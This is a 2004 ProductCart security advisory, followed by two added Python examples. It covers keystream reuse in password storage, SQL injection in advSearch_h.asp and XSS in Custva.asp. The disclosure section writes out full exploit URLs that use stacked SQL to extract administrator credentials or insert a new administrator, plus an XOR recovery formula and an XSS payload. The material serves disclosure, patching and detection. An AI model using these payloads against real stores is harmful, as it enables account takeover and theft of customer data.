*************************************************
** ProductCart - Security Patch - 01/30/2004 **
*************************************************

----------------------------------
Overview
----------------------------------

Hours ago we were made aware of a security flaw in ProductCart that may allow a hacker to gain access to the Control Panel of stores using a SQL database via SQL injection. Please note that:

(1) We have not received any reports of any successful SQL injection attack.
(2) This security threat does NOT apply to stores using MS Access.
(3) Even if the SQL injection attack were successful and the attacker were able to obtain Control Panel login information (user name & password), the attacker would NOT be able to locate the Control Panel login page if you have changed the name of the PCADMIN folder.

If you are using ProductCart 2.1 or later and have not applied our security recommendation to change your "pcadmin" folder name, please do so immediately. You can find instructions in the following document:
http://www.earlyimpact.com/pdf/ProductCart_Security_Tips.pdf

----------------------------------
Brief Description
----------------------------------

This security threat only applies to stores using MS SQL. An SQL Injection vulnerability was found in the search files (pc/advSearch_H.asp, pc/advSearch_I.asp, pc/advSearch_L.asp, pc/advSearch_M.asp, pc/advSearch_P.asp) and the customer login page (pc/custva.asp). A detailed description can be found at the bottom of this message.

----------------------------------
How to address the problem
----------------------------------

Locate your current ProductCart version number (you can find it in the top left corner of the Control Panel welcome page). Once you have determined your version number, find the folder in the Zip file that matches your version.

NOTE: Most servers have Parent Paths enabled. If you are not sure, please check with your hosting provider.
The files contained in the folder appropriate for your version should be uploaded to the "pc" folder (under the "ProductCart" folder) on the server.

If you update your store to a later version of the software, please upload these files again (for the corresponding new version). ProductCart v2.53 (to be released in Feb 2004) and above will already contain these updated files. You will not need to reapply this Security Patch once you have upgraded to ProductCart v2.53 or above.

>> NOTE FOR USERS OF OLD VERSIONS OF PRODUCTCART
If you are running a version of ProductCart prior to v1.6, please contact technical support at support@earlyimpact.com and we will edit your files manually.

----------------------------------
Detailed Security Threat Description
----------------------------------

This security alert was submitted to Early Impact by S-Quadra (http://www.s-quadra.com/)

>>> S-Quadra Comment:

Vulnerability 1: Incorrect use of cryptography

ProductCart uses a stream cipher algorithm (possibly RC4) to encrypt various passwords before storing them in a database. A stream cipher generates a keystream (a sequence of bits used as a key). Encryption is accomplished by combining the keystream with the plaintext with the bitwise XOR operation. The generation of the keystream is independent of the plaintext and ciphertext. In ProductCart a single cryptographic key is used to encrypt all customer and store administrator passwords, so it is possible for an attacker to perform a chosen plaintext attack and obtain the first 100 bytes of keystream (the maximum length of a customer password). Using these bytes an attacker can decrypt any encrypted information from the database, including the store administrator password.

>>> Early Impact Comment:

By uploading the attached files, a hacker will NOT be able to use the above-described flaw in the encryption schema to obtain Control Panel access information.
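The keystream reuse S-Quadra describes above, beside the storage scheme that removes it, as an added example that is not ProductCart's code: the keystream generator is a constructed stand-in (SHA-256 in counter mode rather than RC4), the key and passwords are made-up values, and salted PBKDF2 is the assumed replacement.

```python
import hashlib
import hmac
import os

def keystream(key: bytes, length: int) -> bytes:
    # Constructed stand-in for the cipher's keystream (SHA-256 in counter mode).
    # As with RC4, the output depends only on the key, never on the plaintext.
    out, counter = b"", 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]

def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def stream_encrypt(key: bytes, plaintext: bytes) -> bytes:
    # The flawed scheme: every stored password is XORed with the same keystream.
    return xor_bytes(plaintext, keystream(key, len(plaintext)))

def keystream_leak(known_plaintext: bytes, known_ciphertext: bytes) -> bytes:
    # A customer who knows their own password and can read its ciphertext
    # obtains the keystream prefix: the XOR cancels the plaintext out.
    return xor_bytes(known_plaintext, known_ciphertext)

def decrypt_with_leak(leaked_prefix: bytes, ciphertext: bytes) -> bytes:
    # Any other ciphertext no longer than the leaked prefix decrypts the same way,
    # which is why a 100-byte password exposes every shorter admin password.
    return xor_bytes(ciphertext, leaked_prefix[: len(ciphertext)])

def hash_password(password: str, salt: bytes = b"") -> bytes:
    # Hardened storage (assumed replacement): random 16-byte per-user salt plus a
    # slow one-way hash; two users with equal passwords get unrelated records.
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt + digest

def verify_password(password: str, stored: bytes) -> bool:
    salt, digest = stored[:16], stored[16:]
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return hmac.compare_digest(candidate, digest)

if __name__ == "__main__":
    key = b"constructed-store-key"  # made-up value
    own_pw, own_ct = b"A" * 100, stream_encrypt(key, b"A" * 100)
    admin_ct = stream_encrypt(key, b"admin-secret")
    print(decrypt_with_leak(keystream_leak(own_pw, own_ct), admin_ct))  # b'admin-secret'
    print(verify_password("admin-secret", hash_password("admin-secret")))  # True
```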
-------------

>>> S-Quadra Comment:

Vulnerability 2: SQL Injection vulnerability

A SQL Injection vulnerability has been found in the 'advSearch_h.asp' script. Improper use of user-supplied input filters allows an attacker to modify the SQL query and perform some kinds of SQL injection attacks. Successful exploitation of this vulnerability could allow an attacker to gain administrative access to the ProductCart store and read any information from the store database (i.e. customers' private data). Also an attacker could execute arbitrary commands using the xp_cmdshell function.

>>> Early Impact Comment:

The attached files have been edited to address this issue.

-------------

>>> S-Quadra Comment:

Vulnerability 3: Cross Site Scripting vulnerability in 'CustVa.asp'

By injecting specially crafted JavaScript code in the URL and tricking a user into visiting it, a remote attacker can steal the user's session id and gain access to the user's personal data.

>>> Early Impact Comment:

The attached files have been edited to address this issue.

-------------

>>> S-Quadra description of how the above-mentioned vulnerabilities could be exploited.

Vulnerability 1 and 2:

Platform: MS SQL Server as a backend

ProductCart software incorrectly uses cryptographic algorithms to protect the store administrator password. The combination of this error and the SQL injection vulnerability allows an attacker to gain administrative access to the store. By performing the following scenario an attacker can find the store administrator username and password.

Scenario:

1. An attacker registers a new customer in the store. Let the value of the 'Postal Code' field in the registration form be equal to '987654', and the attacker must select a long password (it should be longer than the store administrator password).

2.
   An attacker performs the following request:

   http://www.shop.com/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;u--pdate%20customers%20set%20name=(s--elect%20top%201%20idadmin%20from%20admins),lastName=(s--elect%20top%01%20adminpassword%20from%20admins),phone=(s--elect%20password%20from%20customers%20where%20zip=987654)%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&IDBrand=0&resultCnt=200&Submit.x=33&

3. An attacker goes to http://www.shop.com/productcart/pc/Custmoda.asp and reads his personal information. The value of the "FirstName" field in this form will be the store administrator login name. The store administrator password is easy to find by this formula:

   adminpass = (Last Name) xor (Phone) xor (customer login password from scenario step 1)

In the following scenario an attacker can add a new administrator to the store.

Scenario:

1. An attacker registers a new customer in the store. Let the value of the 'First Name' field in the registration form be equal to '1*2*3*4*5*6*7*8*9*10*', the value of the 'Last Name' field be equal to '34567', the value of the 'Password' field be equal to '111' and the value of the 'Postal Code' field be equal to '987654'.

2. An attacker performs the following request:

   http://www.shop.com/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;in--sert%20into%20admins%20(idadmin,%20adminpassword,%20adminlevel)%20s--elect%20lastName,%20password,%20name%20from%20customers%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&IDBrand=0&resultCnt=200&Submit.x=33&

3. An attacker logs into the store admin interface with username '34567' and password '111'.

Vulnerability 3:

http://www.shop.com/productcart/pc/Custva.asp?redirectUrl="><"
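Log-side detection for the two request shapes quoted above (a non-numeric value in a numeric advSearch_h.asp parameter, and markup in the Custva.asp redirectUrl), as an added example that is not part of the advisory: it audits constructed IIS W3C log lines, assumes the field order named in the docstring, and checks only the parameter names visible in the quoted requests.

```python
import re
from urllib.parse import parse_qs

# Search parameters that advSearch_*.asp only ever expects as numbers
# (names taken from the request quoted in the advisory, compared case-insensitively).
NUMERIC_PARAMS = {"idcategory", "idsupplier", "customfield", "priceuntil",
                  "pricefrom", "idbrand", "resultcnt"}
NUMERIC_RE = re.compile(r"^\d+(\.\d+)?$")
MARKUP_RE = re.compile(r"[<>\"']")

def audit_query(uri_stem: str, query: str) -> list:
    """Return (parameter, reason) findings for one request to the 'pc' scripts."""
    script = uri_stem.lower().rsplit("/", 1)[-1]
    findings = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:  # parse_qs has already URL-decoded the value
            if script.startswith("advsearch_") and name.lower() in NUMERIC_PARAMS \
                    and not NUMERIC_RE.match(value):
                findings.append((name, "non-numeric value"))
            elif script == "custva.asp" and name.lower() == "redirecturl" \
                    and MARKUP_RE.search(value):
                findings.append((name, "markup characters in redirect"))
    return findings

def scan_iis_log(lines) -> list:
    """IIS W3C fields assumed: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status."""
    hits = []
    for line in lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue
        _date, _time, client_ip, _method, stem, query, _status = fields[:7]
        findings = audit_query(stem, "" if query == "-" else query)
        if findings:
            hits.append((client_ip, stem, findings))
    return hits

# Constructed sample log: clean search, stacked-statement search, redirectUrl with markup, clean redirect.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-01-30 10:01:02 192.0.2.10 GET /productcart/pc/advSearch_h.asp idcategory=0&priceFrom=0&priceUntil=999&keyWord=dark 200
2004-01-30 10:01:09 192.0.2.20 GET /productcart/pc/advSearch_h.asp idcategory=0&priceUntil=999%3Bselect%20*%20from%20products&keyWord=dark 200
2004-01-30 10:02:15 192.0.2.30 GET /productcart/pc/Custva.asp redirectUrl=%22%3E%3C%22 200
2004-01-30 10:02:40 192.0.2.40 GET /productcart/pc/Custva.asp redirectUrl=/productcart/pc/Custmoda.asp 200
""".splitlines()

if __name__ == "__main__":
    for client_ip, stem, findings in scan_iis_log(SAMPLE_LOG):
        print(client_ip, stem, findings)
```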